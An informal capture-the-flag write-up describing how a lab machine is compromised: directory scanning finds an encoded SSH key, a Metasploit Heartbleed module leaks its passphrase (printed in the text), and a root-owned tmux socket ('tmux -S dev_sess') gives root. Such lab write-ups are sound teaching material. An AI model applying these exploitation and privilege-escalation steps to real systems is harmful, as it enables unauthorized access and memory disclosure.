This box consists of a fair amount of rabbit holes that I will just ignore for the most part to avoid this report being super long.
The first thing I always do is run an nmap scan. I found 3 open ports, http, https, and ssh. This is great, web servers are fun. So of course we go to the web server. There’s this stupid picture and nothing else. Absolutely nothing…
The next thing I always do when it comes to web servers is run dirbuster to hopefully find some directories. Well lucky for us this bad boy worked and I was able to move on over to the /dev/ directory. Here there were two files, one named hype_key (ironically this is the key for the user hype). Discovering that as the username is nothing but an annoyance. Anyhow, this key seems to be in hexadecimal format so after decoding that you will get a password encrypted ssh key.
This box required some background knowledge which I would’ve had no clue about without some hints. A bug named “The Heartbleed Bug” which is a serious vulnerability in OpenSSL. This bug allows attackers to steal information protected by SSL/TLS in normal conditions. The attacker is enabled to read the memory of the systems protected by the vulnerable versions of OpenSSL.
After explaining that vulnerability how do you think we are going to get the password for the ssh key? Open up metasploit and get to work. This couldn’t be any easier, simply google metasploit heartbleed and you will find how to do this easily. I recommend setting verbose to true as this will allow you to read the returned text a little easier.
You may have to run the exploit a few times but what your looking for is something that looks interesting. Such as a string labeled $text with an encoded string following it. Noticing the == at the end of the string I assumed it was base64, so after a quick decoding I put that in as the ssh key password for username hype and tada user access.
Password is heartbleedbelievethehype
Now that you are on the system it is time to get root access. (obviously grab the user flag as well) So to skip all the BS what we are going to be doing here is utilizing a tmux config file created by root. If you do “cd /” and then an “ls -la” you can see a .dev directory that has the creator root but hype has group privileges. In there we will find a dev_sess file so now we can do “tmux -S dev_sess” and you will have a root terminal. CoNgRaTs u HaX0r